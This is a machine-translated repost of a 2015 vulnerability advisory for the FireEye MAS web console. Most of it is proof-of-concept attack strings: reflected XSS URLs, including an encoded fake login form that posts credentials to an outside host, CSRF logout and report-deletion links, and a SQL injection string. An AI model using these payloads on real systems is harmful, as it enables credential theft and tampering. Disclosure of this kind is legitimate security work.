FireEye Trojan analysis engine (MAS) 6.4.1 – multiple vulnerabilities-vulnerability warning-the black bar safety net

2015-04-23T00:00:00
ID MYHACK58:62201561569
Type myhack58
Reporter 佚名
Modified 2015-04-23T00:00:00

Description

FireEye Trojan analysis system MAS web login section there are multiple serious vulnerabilities.

[Multiples Vulnerabilities] * * * 3 XSS (reflected) * * 1 CSRF * * 1 NoSQLi (Json object) * * 1 PostGreSQL SQLi (Exploitable?) * * 1 File and Path Disclosure * * 1 Source code Info-leak [*] XSS: The Cross-Station 1 https://192.168.1.50/yara/show_ya_file?name=<body onload=alert(‘XSSED’)%3E The use of POC: the

https://192.168.1.50/yara/show_ya_file?name=<body

onload=document. location=(String. fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109))%3E Or fishing:

https://192.168.1.50/yara/show_ya_file?name=<body

onload=document. write(String. fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,104,101,97,100,62,60,109,101,116,97,32,99,111,110,116,101,110,116,61,34,116,101,120,116,47,104,116,109,108,59,32,99,104,97,114,115,101,116,61,117,116,102,45,56,34,62,60,47,109,101,116,97,62,60,47,104,101,97,100,62,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,59,34,62,60,102,111,114,109,32,77,101,116,104,111,100,61,34,80,79,83,84,34,32,65,99,116,105,111,110,61,34,104,116,116,112,115,58,47,47,119,119,119,46,103,111,111,103,108,101,46,114,117,34,62,80,104,105,115,104,105,110,103,112,97,103,101,32,58,60,98,114,32,47,62,60,98,114,47,62,85,115,101,114,110,97,109,101,32,58,60,98,114,32,47,62,32,60,105,110,112,117,116,32,110,97,109,101,61,34,85,115,101,114,34,32,47,62,60,98,114,32,47,62,80,97,115,115,119,111,114,100,32,58,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,80,97,115,115,119,111,114,100,34,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,47,62,60,98,114,32,47,62,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,86,97,108,105,100,34,32,118,97,108,117,101,61,34,79,107,32,33,34,116,121,112,101,61,34,115,117,98,109,105,116,34,32,47,62,32,60,98,114,32,47,62,60,47,102,111,114,109,62,60,47,100,105,118,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62))%3E

The Cross-Station 2

https://192.168.1.50/network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E

Cross-site 3

https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E

[*] CSRF: 1 administrator exit https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location=”https://192.168.1.50/login/logout?notice=Deconnection+kmkz+CSRF+PoC”</script%3E 2 report delete https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location=”https://192.168.1.50/report/delete_pdf/?id=Alert_Details_fireye-2F_20140502_120000.xml”</script%3E

SQLi PostGreSQL <strong>SQL injection</strong> https://192.168.1.50/event_stream/send_pcap_file?ev_id=9999 OR SELECT 1,2 FROM events /**

output: Event ID ‘9 9 9 9 OR SELECT 1,2 FROM events ‘ could not be retrieved. Couldn't find Event with id=9 9 9 9 OR SELECT 1,2 FROM events

[1] [2] next